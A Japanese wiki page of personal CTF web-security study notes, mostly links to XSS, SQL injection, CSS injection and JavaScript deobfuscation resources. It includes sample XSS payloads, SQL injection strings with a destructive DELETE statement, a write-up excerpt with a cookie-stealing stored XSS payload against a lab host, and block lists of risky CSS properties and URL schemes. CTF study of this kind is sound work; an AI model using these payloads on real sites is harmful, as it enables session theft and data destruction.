CTF Web » 履歴 » バージョン 2
kanata, 2025/05/10 09:23
| 1 | 1 | kanata | # CTF Web |
|---|---|---|---|
| 2 | |||
| 3 | 2 | kanata | {{last_updated_at}} |
| 4 | |||
| 5 | {{>toc}} |
||
| 6 | 1 | kanata | |
| 7 | [[JavaScript]]も必要に応じて参照すべし |
||
| 8 | |||
| 9 | # Chrome DevTools |
||
| 10 | |||
| 11 | ## snippets |
||
| 12 | |||
| 13 | [[JavaScript]]を参照 |
||
| 14 | |||
| 15 | ## 描画フレーム毎のスクリーンショットを記録/再生する機能 |
||
| 16 | |||
| 17 | 2015.10.11現在 Canary版のみ |
||
| 18 | |||
| 19 | ※オペレーション未確認 |
||
| 20 | |||
| 21 | ## Canvas Profiles (Canvas API のダンプ、Draw call の可視化、スナップショット) |
||
| 22 | |||
| 23 | ※オペレーション未確認 |
||
| 24 | |||
| 25 | |||
| 26 | |||
| 27 | |||
| 28 | |||
| 29 | # Cheat Sheets |
||
| 30 | |||
| 31 | ## [OWASP Cheat Sheet Series](https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series) |
||
| 32 | |||
| 33 | OWASP Cheat Sheets - XSS (Cross Site Scripting) Prevention Cheat Sheet |
||
| 34 | https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet |
||
| 35 | |||
| 36 | OWASP Cheat Sheets - XSS Filter Evasion Cheat Sheet |
||
| 37 | https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet |
||
| 38 | |||
| 39 | OWASP Cheat Sheets - SQL Injection Prevention Cheat Sheet |
||
| 40 | https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet |
||
| 41 | |||
| 42 | ## katagaitaiCTF XSS千本ノック |
||
| 43 | |||
| 44 | 0x90 - katagaitai CTF勉強会 #9 writeup(Webパート) |
||
| 45 | http://0x90.hatenablog.jp/entry/2017/08/27/201021 |
||
| 46 | |||
| 47 | Qiita - XSS千本ノック@katagaitaiCTF勉強会 writeup |
||
| 48 | http://qiita.com/howmuch/items/981a9c85620321c20c69 |
||
| 49 | |||
| 50 | HayatoDoi.github.io - katagaitaiCTF xss千本ノック write up |
||
| 51 | https://hayatodoi.github.io/page.html?name=2017-08-28_katagaitaiCTF%20xss%E5%8D%83%E6%9C%AC%E3%83%8E%E3%83%83%E3%82%AF%20write%20up.md |
||
| 52 | |||
| 53 | ななふんのブログ - katagaitai CTF勉強会 #9 XSS千本ノック Writeup |
||
| 54 | http://sec-rookie.hatenablog.com/entry/2017/08/29/015957 |
||
| 55 | |||
| 56 | ## XSS |
||
| 57 | |||
| 58 | XSS cheat sheet - porswiggerがリリースしたXSSのcheat sheet |
||
| 59 | https://portswigger.net/web-security/cross-site-scripting/cheat-sheet |
||
| 60 | |||
| 61 | github masatokinugawa/filterbypass - Browser's XSS Filter Bypass Cheat Sheet |
||
| 62 | https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet#2%E3%81%A4%E4%BB%A5%E4%B8%8A%E3%81%AE%E6%B3%A8%E5%85%A5%E3%83%9D%E3%82%A4%E3%83%B3%E3%83%88%E3%81%8C%E3%81%82%E3%82%8B%E5%A0%B4%E5%90%88 |
||
| 63 | |||
| 64 | 色んなXSS |
||
| 65 | http://nootropic.me/blog/2015/02/16/%E8%89%B2%E3%82%93%E3%81%AAxss/#more-396 |
||
| 66 | |||
| 67 | HTML5 Security Cheatsheet |
||
| 68 | https://html5sec.org/ |
||
| 69 | |||
| 70 | cure53/HTTPLeaks (HTTPリクエストを発生させるような要素/属性の一覧) |
||
| 71 | https://github.com/cure53/HTTPLeaks |
||
| 72 | |||
| 73 | SHARED ONLINE FUZZING (XSSスキャナーのアウトプットを活用できる) |
||
| 74 | http://shazzer.co.uk |
||
| 75 | |||
| 76 | Probing to Find XSS と WebGunというツール |
||
| 77 | http://brutelogic.com.br/blog/category/xss-building/ http://brutelogic.com.br/webgun/ |
||
| 78 | |||
| 79 | Unleashing an Ultimate XSS Polyglot |
||
| 80 | https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot |
||
| 81 | |||
| 82 | FOOLING THE INTERPRETER - XSS Cheat Sheet |
||
| 83 | http://brutelogic.com.br/blog/cheat-sheet/ |
||
| 84 | |||
| 85 | Qiita - 俺的MarkdownにおけるXSS |
||
| 86 | https://qiita.com/Azunyan1111/items/64d23396bcf2213af024 |
||
| 87 | |||
| 88 | |||
| 89 | |||
| 90 | |||
| 91 | |||
| 92 | |||
| 93 | ### CSSの制限(この属性の制限をしないとJavaScript埋め込まれるかも) |
||
| 94 | |||
| 95 | * expression |
||
| 96 | * behavior / behaviour |
||
| 97 | * moz-binding |
||
| 98 | * include-source |
||
| 99 | * url |
||
| 100 | * absolute |
||
| 101 | * fixed |
||
| 102 | * content |
||
| 103 | * -o-link |
||
| 104 | * AlphaImageLoader |
||
| 105 | * javascript: |
||
| 106 | * vbscript: |
||
| 107 | * data: |
||
| 108 | |||
| 109 | ### リンクの制限(ブラウザでこれを実装している。サーバ側で上手くチェックしてないとすり抜けられる・・・かも) |
||
| 110 | |||
| 111 | * http: |
||
| 112 | * https: |
||
| 113 | * ftp: |
||
| 114 | * mailto: |
||
| 115 | * file: |
||
| 116 | * telnet: |
||
| 117 | * gopher: |
||
| 118 | * news: |
||
| 119 | * wais: |
||
| 120 | |||
| 121 | ## SQLインジェクション |
||
| 122 | |||
| 123 | SQL Injection Cheat Sheet |
||
| 124 | http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ |
||
| 125 | |||
| 126 | Hacoder - SQL Injection Authentication Bypass Cheat Sheet |
||
| 127 | http://www.hacoder.com/2015/10/sql-injection-authentication-bypass-cheat-sheet/ |
||
| 128 | |||
| 129 | GracefulSecurity - SQL Injection Cheat Sheet: MySQL |
||
| 130 | https://www.gracefulsecurity.com/category/cheat-sheets/ |
||
| 131 | |||
| 132 | GracefulSecurity - SQL Injection Cheat Sheet: MSSQL |
||
| 133 | https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/ |
||
| 134 | |||
| 135 | shikata ga nai - SQL injection cheat sheet(1) |
||
| 136 | https://cysec148.hatenablog.com/entry/2019/12/05/123227 |
||
| 137 | |||
| 138 | |||
| 139 | |||
| 140 | |||
| 141 | |||
| 142 | # XSS |
||
| 143 | |||
| 144 | | 種類 | パターン | 例 | 備考 | |
||
| 145 | |--------|---------------|-------------------------------------------------------------------------|------| |
||
| 146 | | 反射型 | Reflected XSS | ```<html> <body> XSS HERE: <script>alert(1)</script> </body> </html>``` | |
||
| 147 | | 反射型 | 属性内 | ```<html> <body> <input name="q" value=""onmouseover=alert(1)//"> </body> </html>``` | |
||
| 148 | | 反射型 | リンク部分 | ```<html> <body> <a href="javascript:alert(1)">Click</a> </body> </html>``` | Auditorがスルー |
||
| 149 | | 反射型 | 文字列リテラル| ```<body> <script> var q="";alert(1)//"; </script> </body>``` | Auditorがスルー |
||
| 150 | | DOM Based XSS | その1 | ```<body> <script> document.write(location.hash); </script> </body>``` | IEがスルー |
||
| 151 | | DOM Based XSS | その2 | ```<body> <script> document.body.innerHTML=location.hash; </script> </body>``` | IEがスルー,Auditorがスルー |
||
| 152 | | 持続型/蓄積型 | Stored XSS | ```<div id="profile"> <script>alert(1)</script> </div>``` | IEがスルー,Auditorがスルー,NoScript がスルー |
||
| 153 | |||
| 154 | |||
| 155 | SecurityCamp2015「バグハンティング入門」 |
||
| 156 | http://www.slideshare.net/masatokinugawa/ss-51723687 |
||
| 157 | |||
| 158 | # SQLインジェクション |
||
| 159 | |||
| 160 | http://npnl.hatenablog.jp/entry/20080412/1207965105 |
||
| 161 | http://matome.naver.jp/odai/2137849639545516001 |
||
| 162 | https://www.nicksecuritylog.com/entry/SQLInjection_basic |
||
| 163 | |||
| 164 | ``` |
||
| 165 | ' OR 'A' = 'A |
||
| 166 | '; DELETE FROM ユーザマスタ WHERE 'A' = 'A |
||
| 167 | '; DELETE FROM ユーザマスタ WHERE 'A' = 'A' -- |
||
| 168 | fuga' OR ユーザID = 'admin |
||
| 169 | ``` |
||
| 170 | |||
| 171 | ## SQLインジェクション - 対象DBを判別する |
||
| 172 | |||
| 173 | * 「||」を利用した文字列連結に成功している場合、SQLiteを利用していると判断できる。 |
||
| 174 | |||
| 175 | >ex) hogehoge と hoge'||'hoge の結果が同じなら SQLiteです。 |
||
| 176 | |||
| 177 | * コメント文字の扱いから判断する。 |
||
| 178 | |||
| 179 | >sqlite |
||
| 180 | >>#はコメントにならない(エラーにならない) |
||
| 181 | |||
| 182 | >mysql |
||
| 183 | >>#はコメントになる(エラーになる) |
||
| 184 | |||
| 185 | |||
| 186 | ## よく使うMySQL(MariaDB)コマンド |
||
| 187 | |||
| 188 | 対話型インタフェース |
||
| 189 | |||
| 190 | ``` |
||
| 191 | SHOW DATABASES; — DBの一覧 |
||
| 192 | USE hogehoge; — hogehogeのDBを参照 |
||
| 193 | SHOW TABLES; — テーブル一覧 |
||
| 194 | SHOW COLUMNS FROM hoge; — hogeテーブルのカラムを表示 |
||
| 195 | SHOW INDEX FROM hoge; — hogeテーブルのインデックスを表示。すべてのクエリに対して LIKE "hoge%"などLIKE句が利用できる |
||
| 196 | EXPLAIN SELECT * FROM hogehgoe; — "SELECT * FROM hogehgoe"がどのように実行されるのか検証するコマンド |
||
| 197 | |||
| 198 | ``` |
||
| 199 | |||
| 200 | その他(コマンドインタフェース) |
||
| 201 | |||
| 202 | ``` |
||
| 203 | $ mysql -hlocalhost -uroot -ppass # -h ホスト -u ユーザー -p パスワード |
||
| 204 | $ mysqldump database > hoge.sql # hoge.aqlファイルにdatabaseのスキーマをダンプする |
||
| 205 | $ mysql database < hoge.sql #hoge.sqlファイルのクエリをdatabase上で実行する |
||
| 206 | ``` |
||
| 207 | |||
| 208 | ## ブラインドSQLインジェクション |
||
| 209 | |||
| 210 | 俺的備忘録 〜なんかいろいろ〜 - シェル芸でブラインドSQLインジェクションを行う |
||
| 211 | https://orebibou.com/2019/01/%e3%82%b7%e3%82%a7%e3%83%ab%e8%8a%b8%e3%81%a7%e3%83%96%e3%83%a9%e3%82%a4%e3%83%b3%e3%83%89sql%e3%82%a4%e3%83%b3%e3%82%b8%e3%82%a7%e3%82%af%e3%82%b7%e3%83%a7%e3%83%b3%e3%82%92%e8%a1%8c%e3%81%86/ |
||
| 212 | |||
| 213 | ## Memo |
||
| 214 | |||
| 215 | 参考 T.Teradaの日記 - [セキュリティ]SQL Injectionシグネチャの更新 |
||
| 216 | http://d.hatena.ne.jp/teracc/20150507 |
||
| 217 | |||
| 218 | |||
| 219 | # CSS Injection |
||
| 220 | |||
| 221 | CSS Injection (+ Recursive Import) の原理と攻撃手法およびその実装について |
||
| 222 | http://szarny.hatenablog.com/entry/2019/10/17/CSS_Injection_%28%2B_Recursive_Import%29_%E3%81%AE%E5%8E%9F%E7%90%86%E3%81%A8%E6%94%BB%E6%92%83%E6%89%8B%E6%B3%95%E3%81%8A%E3%82%88%E3%81%B3%E3%81%9D%E3%81%AE%E5%AE%9F%E8%A3%85%E3%81%AB%E3%81%A4%E3%81%84 |
||
| 223 | |||
| 224 | # JavaScript難読化 |
||
| 225 | |||
| 226 | ## encode方式 |
||
| 227 | |||
| 228 | jjencode |
||
| 229 | http://utf-8.jp/public/jjencode.html |
||
| 230 | |||
| 231 | aaencode |
||
| 232 | http://utf-8.jp/public/aaencode.html |
||
| 233 | |||
| 234 | JSFuck |
||
| 235 | http://www.jsfuck.com/ |
||
| 236 | |||
| 237 | JavaScript を PNG に圧縮する |
||
| 238 | http://yomotsu.net/blog/2015/03/01/js2png.html |
||
| 239 | |||
| 240 | ## decode |
||
| 241 | |||
| 242 | Caffeine Monkey |
||
| 243 | http://kinshachi.ddo.jp/blog/comp/archives/000799.html |
||
| 244 | |||
| 245 | malzilla |
||
| 246 | http://malzilla.sourceforge.net/ |
||
| 247 | |||
| 248 | aadecode |
||
| 249 | http://cat-in-136.github.io/2010/12/aadecode-decode-encoded-as-aaencode.html |
||
| 250 | |||
| 251 | Monyer Js(jjdecode Base64,MD5,SHA1,UTF7,URI等々の変換ができる) |
||
| 252 | http://monyer.com/demo/monyerjs/ |
||
| 253 | |||
| 254 | ESDeobfuscate |
||
| 255 | http://m1el.github.io/esdeobfuscate/ |
||
| 256 | |||
| 257 | とりあえず動かしてみるには |
||
| 258 | http://javascripter.hatenablog.com/entry/20090607/1244386028 |
||
| 259 | |||
| 260 | ```html |
||
| 261 | <html><head><script> |
||
| 262 | |||
| 263 | Object.constructor = function (code) { |
||
| 264 | alert(Function(code)()); |
||
| 265 | }; |
||
| 266 | |||
| 267 | // ここに記号化されたプログラムを貼る |
||
| 268 | |||
| 269 | </script></head><body></body></html> |
||
| 270 | ``` |
||
| 271 | |||
| 272 | 難読化された中で何か変数に設定されたか確認するには |
||
| 273 | JavaScriptコンソールで |
||
| 274 | |||
| 275 | ``` |
||
| 276 | console.dir(window) |
||
| 277 | ``` |
||
| 278 | |||
| 279 | javascript-visualizer - JavaScriptの実行内容を可視化 |
||
| 280 | https://tylermcginnis.com/javascript-visualizer |
||
| 281 | |||
| 282 | # WebAssembly |
||
| 283 | |||
| 284 | WebAssembly Reference Manual |
||
| 285 | https://github.com/sunfishcode/wasm-reference-manual/blob/master/WebAssembly.md |
||
| 286 | |||
| 287 | WebAssembly解いてみる |
||
| 288 | https://xrekkusu.hatenablog.jp/entry/2018/12/12/125052 |
||
| 289 | |||
| 290 | WebAssembly テキストフォーマットを理解する |
||
| 291 | https://developer.mozilla.org/ja/docs/WebAssembly/Understanding_the_text_format |
||
| 292 | |||
| 293 | # Study |
||
| 294 | |||
| 295 | こんとろーるしーこんとろーるぶい - 【2019年】CTF Web問題の攻撃手法まとめ (Web問題のwriteupぜんぶ読む) |
||
| 296 | https://graneed.hatenablog.com/entry/2019/12/29/115100 |
||
| 297 | |||
| 298 | jhaddix |
||
| 299 | https://github.com/jhaddix [The Bug Hunters Methodology](https://github.com/jhaddix/tbhm) |
||
| 300 | |||
| 301 | > KnowHow満載 |
||
| 302 | |||
| 303 | |||
| 304 | |||
| 305 | |||
| 306 | ## JavaScriptセキュリティの基礎知識 |
||
| 307 | |||
| 308 | JavaScriptセキュリティの基礎知識 第1回 Webセキュリティのおさらい その1 |
||
| 309 | http://gihyo.jp/dev/serial/01/javascript-security/0001 |
||
| 310 | |||
| 311 | JavaScriptセキュリティの基礎知識 第2回 Webセキュリティのおさらい その2 XSS |
||
| 312 | http://gihyo.jp/dev/serial/01/javascript-security/0002 |
||
| 313 | |||
| 314 | JavaScriptセキュリティの基礎知識 第3回 Webセキュリティのおさらい その3 CSRF・オープンリダイレクト・クリックジャッキング |
||
| 315 | http://gihyo.jp/dev/serial/01/javascript-security/0003 |
||
| 316 | |||
| 317 | JavaScriptセキュリティの基礎知識 第4回 URLとオリジン |
||
| 318 | http://gihyo.jp/dev/serial/01/javascript-security/0004 |
||
| 319 | |||
| 320 | JavaScriptセキュリティの基礎知識 第5回 問題を発生させにくくするURLの扱い方 |
||
| 321 | http://gihyo.jp/dev/serial/01/javascript-security/0005 |
||
| 322 | |||
| 323 | JavaScriptセキュリティの基礎知識 第6回 DOM-based XSS その1 |
||
| 324 | http://gihyo.jp/dev/serial/01/javascript-security/0006 |
||
| 325 | |||
| 326 | JavaScriptセキュリティの基礎知識 第7回 DOM-based XSS その2 |
||
| 327 | http://gihyo.jp/dev/serial/01/javascript-security/0007 |
||
| 328 | |||
| 329 | JavaScriptセキュリティの基礎知識 第8回 DOM-based XSS その3 |
||
| 330 | http://gihyo.jp/dev/serial/01/javascript-security/0008 |
||
| 331 | |||
| 332 | # Memo |
||
| 333 | |||
| 334 | 【2020年】CTF Web問題の攻撃手法まとめ |
||
| 335 | https://graneed.hatenablog.com/entry/2021/08/09/115452 |
||
| 336 | |||
| 337 | 【2021年】CTF Web問題の攻撃手法まとめ |
||
| 338 | https://graneed.hatenablog.com/entry/2022/09/28/100000 |
||
| 339 | |||
| 340 | 競技セキュリティまとめのまとめ |
||
| 341 | https://blog.hamayanhamayan.com/entry/2023/02/22/085938 |
||
| 342 | |||
| 343 | 雑記 - TMCTF Writeup (Analysis Offensive 300) |
||
| 344 | http://icchy.hatenablog.jp/entry/2015/09/28/115402 |
||
| 345 | |||
| 346 | nameパラメータに |
||
| 347 | |||
| 348 | ~~~html |
||
| 349 | "><scrscriptipt>tmp=document.cookie; |
||
| 350 | document.cookie='PHPSESSID=0ufcvu21seft5sn3l2sllni896'; |
||
| 351 | location.href='result.php?name='+tmp</scripscriptt> |
||
| 352 | ~~~ |
||
| 353 | |||
| 354 | をURLエンコードしたものを渡した以下のURLを用意し,contact.phpのcommentに入力して送信した. |
||
| 355 | |||
| 356 | >蓄積型XSS(Stored XSS)を利用している |
||
| 357 | |||
| 358 | ~~~ |
||
| 359 | http://localhost:40100/737c08b6f0ea477cb4ce3eb1b8e81a87/contact.php?name=%22%3E%3Cscrscriptipt%3Etmp%3Ddocument.cookie%3B%0D%0Adocument.cookie%3D%27PHPSESSID%3D0ufcvu21seft5sn3l2sllni896%27%3B%0D%0Alocation.href%3D%27result.php%3Fname%3D%27%2Btmp%3C%2Fscripscriptt%3E |
||
| 360 | ~~~ |
||
| 361 | |||
| 362 | --- |
||
| 363 | |||
| 364 | crt.sh Certificate Search (Certificate Transparencyのログに登録されているサブドメインを列挙) |
||
| 365 | https://crt.sh/ |
||
| 366 | |||
| 367 | Firing Range |
||
| 368 | http://public-firing-range.appspot.com/ |
||
| 369 | |||
| 370 | >Googleが脆弱性スキャナーツールの性能を評価するために作られたWebサイト |
||
| 371 | |||
| 372 | Github cure53/H5SC - Unicode Characters in URLs |
||
| 373 | https://github.com/cure53/H5SC/wiki/Unicode-Characters-in-URLs |
||
| 374 | |||
| 375 | >特殊な文字でも、URLでは適切な文字に変換されるブラウザの仕様 |
||
| 376 | |||
| 377 | 例 |
||
| 378 | |||
| 379 | ~~~ |
||
| 380 | ₨ resolves to http://rs.org/ |
||
| 381 | ~~~ |
||
| 382 | |||
| 383 | Github - athre0z/wasm |
||
| 384 | https://github.com/athre0z/wasm |
||
| 385 | |||
| 386 | >WebAssembly decoder & disassembler library |
||
| 387 | |||
| 388 | Masato Kinugawa Security Blog - ブラウザのXSS保護機能をバイパスする(14) |
||
| 389 | http://masatokinugawa.l0.cm/2017/05/xss14.html |
||
| 390 | |||
| 391 | Apache HTTP Serverのバージョンを当てる方法 |
||
| 392 | https://www.mbsd.jp/blog/20170904.html |
||
| 393 | |||
| 394 | CTFを助けるターミナルテクニック |
||
| 395 | https://www.ryotosaito.com/blog/?p=113 |
||
| 396 | |||
| 397 | web FUzz ChecK |
||
| 398 | https://github.com/m---/webfuck |
||
| 399 | |||
| 400 | CTFで出題されたXS-Leaks |
||
| 401 | https://speakerdeck.com/ntomoya/ctfdechu-ti-saretaxs-leaks-a95f5b6a-134d-4537-a104-233ce9b8c56f |
||
| 402 | |||
| 403 | ブラウザ開発者ツールのネットワークタブに表示されない情報送信手法 |
||
| 404 | https://qiita.com/satoki/items/f4398327985b830ca23d |
||
| 405 | |||
| 406 | ## CSSを利用したキーロギング |
||
| 407 | |||
| 408 | maxchehab/CSS-Keylogging |
||
| 409 | https://github.com/maxchehab/CSS-Keylogging |
||
| 410 | |||
| 411 | >CSS セレクタで form の value を引っ掛けて background プロパティで外部サーバにリクエスト投げれば,JS 使わなくても CSS だけでユーザの入力を盗める |